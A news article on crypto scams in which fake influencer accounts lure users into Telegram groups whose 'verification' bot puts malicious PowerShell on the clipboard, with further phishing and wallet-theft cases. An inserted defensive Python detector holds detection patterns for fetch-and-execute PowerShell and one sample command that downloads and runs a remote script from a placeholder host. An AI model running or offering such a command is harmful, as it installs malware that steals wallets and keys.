A new wave of crypto scams has emerged, with attackers using fake X accounts to impersonate popular influencers and lure unsuspecting users into fraudulent Telegram groups.
Users are then manipulated into installing malicious software that compromises their crypto wallet data.
Scammers moving beyond simple phishing scams
According to blockchain security firm Scam Sniffer, the fraudsters comment on legitimate posts, luring users with exclusive information on “alpha” investments and tips. Once people join these Telegram groups, they are immediately asked to complete a verification process using a bot called officiaisaFeguardbot.
The bot creates a false sense of urgency and pushes users to complete the verification quickly. However, this seemingly harmless step is a trap: when the user completes the verification, the bot injects malicious PowerShell code into the user’s clipboard. When run, the code downloads malicious software designed to compromise the system and steal sensitive data, including crypto wallet information.
Scam Sniffer said that the malicious software has been flagged by VirusTotal as harmful and that previous cases of similar attacks have resulted in the theft of private keys, leading to significant financial losses.
“This represents a new evolution in cryptographic scams: going beyond simple phishing to combine social engineering with malicious software. Be attentive and share it to protect others.”
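The clipboard step described above can be screened for on the defensive side. The following added example (not code from Scam Sniffer or the original article) is a heuristic Python check for clipboard or command-line text that launches PowerShell with a hidden window, an encoded command, or a fetch-and-execute pair; the indicator names, patterns and sample strings are assumptions constructed for illustration.

```python
import base64
import binascii
import re

# Heuristic indicators; names and patterns are choices made for this example.
INDICATORS = {
    "powershell_invocation": re.compile(r"\b(powershell|pwsh)(\.exe)?\b", re.I),
    "hidden_window": re.compile(r"-w(in(dowstyle)?)?\s+(h(idden)?|1)\b", re.I),
    "network_fetch": re.compile(
        r"\b(iwr|irm|curl|wget|Invoke-WebRequest|Invoke-RestMethod)\b"
        r"|DownloadString|DownloadFile|Net\.WebClient", re.I),
    "dynamic_execution": re.compile(r"\b(iex|Invoke-Expression)\b", re.I),
}
ENCODED_ARG = re.compile(r"-e(nc(odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", re.I)
# Constructed clipboard samples (not taken from the campaign).
SAMPLES = [
    'powershell -w hidden -c "iex (iwr https://example.invalid/verify.ps1)"',
    "Verification code: 483921",
]


def decode_encoded_command(text):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or ''."""
    match = ENCODED_ARG.search(text)
    if not match:
        return ""
    try:
        return base64.b64decode(match.group(3), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return ""


def find_indicators(text):
    """Return the sorted indicator names found in text or its decoded payload."""
    decoded = decode_encoded_command(text)
    hits = {name for name, rx in INDICATORS.items()
            if rx.search(text) or rx.search(decoded)}
    if decoded:
        hits.add("encoded_command")
    return sorted(hits)


def is_suspicious(text):
    """Flag PowerShell that hides its window, is encoded, or fetches and runs code."""
    hits = set(find_indicators(text))
    if "powershell_invocation" not in hits:
        return False
    fetch_and_run = {"network_fetch", "dynamic_execution"} <= hits
    return fetch_and_run or "encoded_command" in hits or "hidden_window" in hits
```

A check like this is a triage aid for clipboard monitors or process command-line logs, not a replacement for endpoint protection; a plain `powershell Get-ChildItem` call is deliberately left unflagged.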
Rampant scams
Last month, Casa CEO Nick Neuman shared a chilling story about a phishing scam that targeted him. In a post on X, Neuman described a call he received from a scammer posing as a Coinbase support agent. The scammer stated that Neuman's password change request had been canceled and encouraged him to click on a suspicious email link.
When Neuman began to question the scammer, the scammer dropped the act and revealed the true nature of the operation. The scammer boasted that he had recently stolen $35,000 from a victim and made it clear that the scam only targeted rich crypto investors.
More recently, a crypto user with the pseudonym “Leftsideemiri” reported losing $300,000 to a social engineering attack. According to the user, the attack began when they received a message containing a link to a KakaoTalk conversation, which was allegedly for an association meeting. Although the link seemed broken, the user clicked it, believing it was harmless.
In retrospect, they suspect that clicking on the link caused the installation of malicious software, which compromised their Ethereum and Solana wallets, along with other wallets. The user made it clear that they had not approved or signed any transaction, indicating that the attack was covert and took advantage of social engineering techniques to steal funds.